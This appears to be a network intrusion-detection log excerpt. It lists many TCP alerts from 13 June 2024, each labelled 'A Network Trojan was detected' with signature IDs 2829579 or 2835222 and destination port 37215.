              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632595
              SID:2829579
              Source Port:46946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656769
              SID:2829579
              Source Port:53454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307530
              SID:2829579
              Source Port:41292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094686
              SID:2829579
              Source Port:35826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316705
              SID:2829579
              Source Port:36186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345770
              SID:2829579
              Source Port:46204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212865
              SID:2829579
              Source Port:39778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152146
              SID:2835222
              Source Port:33022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222633
              SID:2829579
              Source Port:51056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724608
              SID:2835222
              Source Port:53506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404119
              SID:2829579
              Source Port:54144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786304
              SID:2829579
              Source Port:36410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695022
              SID:2829579
              Source Port:44526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707559
              SID:2829579
              Source Port:40850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695846
              SID:2835222
              Source Port:56584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180577
              SID:2829579
              Source Port:32988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153539
              SID:2829579
              Source Port:41600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347035
              SID:2829579
              Source Port:42430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503467
              SID:2835222
              Source Port:34934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159874
              SID:2829579
              Source Port:57702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359713
              SID:2835222
              Source Port:51168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248178
              SID:2835222
              Source Port:32804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403863
              SID:2829579
              Source Port:50280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164830
              SID:2829579
              Source Port:40498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096779
              SID:2829579
              Source Port:49744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991618
              SID:2829579
              Source Port:46350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417793
              SID:2829579
              Source Port:34370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156694
              SID:2829579
              Source Port:39800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755432
              SID:2835222
              Source Port:51992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635102
              SID:2829579
              Source Port:58364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174005
              SID:2835222
              Source Port:44692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196717
              SID:2829579
              Source Port:42396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016512
              SID:2835222
              Source Port:35422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416186
              SID:2829579
              Source Port:41388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028404
              SID:2835222
              Source Port:58456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629879
              SID:2835222
              Source Port:45034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405248
              SID:2829579
              Source Port:40698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129128
              SID:2835222
              Source Port:41638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509070
              SID:2829579
              Source Port:52020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258729
              SID:2829579
              Source Port:57670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014054
              SID:2835222
              Source Port:41646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091479
              SID:2829579
              Source Port:36646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612735
              SID:2835222
              Source Port:40660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458476
              SID:2829579
              Source Port:43352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239703
              SID:2835222
              Source Port:37908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440060
              SID:2835222
              Source Port:43198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835327
              SID:2835222
              Source Port:56618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348796
              SID:2829579
              Source Port:39044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785150
              SID:2835222
              Source Port:37188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503936
              SID:2829579
              Source Port:49346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675112
              SID:2829579
              Source Port:40070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454866
              SID:2835222
              Source Port:51526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656299
              SID:2835222
              Source Port:55898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178809
              SID:2835222
              Source Port:47918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885176
              SID:2829579
              Source Port:39106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730047
              SID:2835222
              Source Port:59254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307931
              SID:2829579
              Source Port:60304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914294
              SID:2835222
              Source Port:58088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.933127
              SID:2835222
              Source Port:40724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358659
              SID:2835222
              Source Port:58592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550749
              SID:2829579
              Source Port:55636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010761
              SID:2829579
              Source Port:51186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403824
              SID:2835222
              Source Port:60612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711338
              SID:2835222
              Source Port:40122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309570
              SID:2829579
              Source Port:47636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248723
              SID:2829579
              Source Port:42662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377649
              SID:2835222
              Source Port:43524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657068
              SID:2835222
              Source Port:38782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060154
              SID:2829579
              Source Port:50104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836097
              SID:2829579
              Source Port:50220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.402872
              SID:2835222
              Source Port:55534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711415
              SID:2835222
              Source Port:35654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908207
              SID:2829579
              Source Port:54292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213465
              SID:2835222
              Source Port:40932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672695
              SID:2829579
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167893
              SID:2829579
              Source Port:38162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252329
              SID:2829579
              Source Port:60818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566778
              SID:2835222
              Source Port:51254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026084
              SID:2835222
              Source Port:46432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731282
              SID:2829579
              Source Port:56880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023887
              SID:2835222
              Source Port:47460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730855
              SID:2835222
              Source Port:36018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749527
              SID:2835222
              Source Port:48652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042505
              SID:2829579
              Source Port:40410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016881
              SID:2835222
              Source Port:32920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834264
              SID:2829579
              Source Port:59666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278492
              SID:2835222
              Source Port:38432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016215
              SID:2835222
              Source Port:32910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057952
              SID:2835222
              Source Port:34930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343699
              SID:2835222
              Source Port:59360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357520
              SID:2835222
              Source Port:46542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696932
              SID:2835222
              Source Port:48648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678340
              SID:2829579
              Source Port:43792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170579
              SID:2835222
              Source Port:57482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570448
              SID:2829579
              Source Port:44782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823565
              SID:2829579
              Source Port:50884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254578
              SID:2829579
              Source Port:39616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300265
              SID:2835222
              Source Port:37536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244520
              SID:2835222
              Source Port:47960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268543
              SID:2835222
              Source Port:51460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554494
              SID:2829579
              Source Port:60268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107826
              SID:2835222
              Source Port:48850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255960
              SID:2829579
              Source Port:38992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415752
              SID:2835222
              Source Port:47842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800071
              SID:2829579
              Source Port:53790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164633
              SID:2829579
              Source Port:42798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024477
              SID:2829579
              Source Port:58428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987326
              SID:2835222
              Source Port:53908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403912
              SID:2835222
              Source Port:60298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278728
              SID:2835222
              Source Port:41316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214604
              SID:2835222
              Source Port:43820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137997
              SID:2835222
              Source Port:43090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607911
              SID:2835222
              Source Port:40590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757759
              SID:2835222
              Source Port:41782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509768
              SID:2829579
              Source Port:44676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279237
              SID:2829579
              Source Port:50682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152790
              SID:2835222
              Source Port:45586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089206
              SID:2829579
              Source Port:39836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937319
              SID:2829579
              Source Port:48048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378433
              SID:2829579
              Source Port:36218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660278
              SID:2829579
              Source Port:49132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277043
              SID:2829579
              Source Port:52998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823752
              SID:2829579
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669677
              SID:2835222
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611393
              SID:2835222
              Source Port:59844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507869
              SID:2829579
              Source Port:36014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786089
              SID:2829579
              Source Port:38634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658684
              SID:2835222
              Source Port:46562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678131
              SID:2835222
              Source Port:38398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759124
              SID:2835222
              Source Port:45852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042050
              SID:2835222
              Source Port:36262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458151
              SID:2829579
              Source Port:35776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028240
              SID:2835222
              Source Port:45018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231157
              SID:2835222
              Source Port:56306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568567
              SID:2835222
              Source Port:43438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997108
              SID:2835222
              Source Port:47894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453425
              SID:2829579
              Source Port:56102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436737
              SID:2835222
              Source Port:44872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995205
              SID:2835222
              Source Port:38236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087285
              SID:2835222
              Source Port:32800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632501
              SID:2829579
              Source Port:36582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407492
              SID:2829579
              Source Port:50678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275972
              SID:2829579
              Source Port:59614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344901
              SID:2835222
              Source Port:37946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294852
              SID:2835222
              Source Port:53104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546147
              SID:2829579
              Source Port:44168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710572
              SID:2835222
              Source Port:57684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840089
              SID:2835222
              Source Port:53716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611086
              SID:2829579
              Source Port:60846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888317
              SID:2829579
              Source Port:46316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124201
              SID:2835222
              Source Port:37958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671665
              SID:2829579
              Source Port:32996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787514
              SID:2835222
              Source Port:36512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708128
              SID:2835222
              Source Port:40712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991273
              SID:2829579
              Source Port:60774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872162
              SID:2829579
              Source Port:46122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375559
              SID:2835222
              Source Port:59564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155692
              SID:2829579
              Source Port:46588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153501
              SID:2835222
              Source Port:52394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676572
              SID:2829579
              Source Port:53722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753422
              SID:2829579
              Source Port:41628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165064
              SID:2829579
              Source Port:52366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570364
              SID:2829579
              Source Port:59806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731033
              SID:2835222
              Source Port:37862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988702
              SID:2829579
              Source Port:57324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112220
              SID:2829579
              Source Port:51044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277008
              SID:2829579
              Source Port:59446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510133
              SID:2835222
              Source Port:56526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831915
              SID:2835222
              Source Port:52358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177908
              SID:2835222
              Source Port:53908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178026
              SID:2829579
              Source Port:55784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040447
              SID:2829579
              Source Port:53986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670837
              SID:2829579
              Source Port:48572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970136
              SID:2835222
              Source Port:54198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350284
              SID:2835222
              Source Port:37328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090635
              SID:2829579
              Source Port:51766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697176
              SID:2835222
              Source Port:43256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657672
              SID:2829579
              Source Port:53380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710810
              SID:2829579
              Source Port:38152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678828
              SID:2835222
              Source Port:44462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046149
              SID:2835222
              Source Port:39830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175776
              SID:2835222
              Source Port:55566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196114
              SID:2829579
              Source Port:60832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092105
              SID:2829579
              Source Port:47878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802716
              SID:2829579
              Source Port:48658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680759
              SID:2829579
              Source Port:43510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835593
              SID:2835222
              Source Port:51590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178082
              SID:2835222
              Source Port:52448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039190
              SID:2829579
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107870
              SID:2835222
              Source Port:36024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952512
              SID:2829579
              Source Port:55272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839280
              SID:2829579
              Source Port:39670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912396
              SID:2829579
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555470
              SID:2829579
              Source Port:55010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752826
              SID:2829579
              Source Port:35142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338120
              SID:2829579
              Source Port:56284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248584
              SID:2829579
              Source Port:40774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
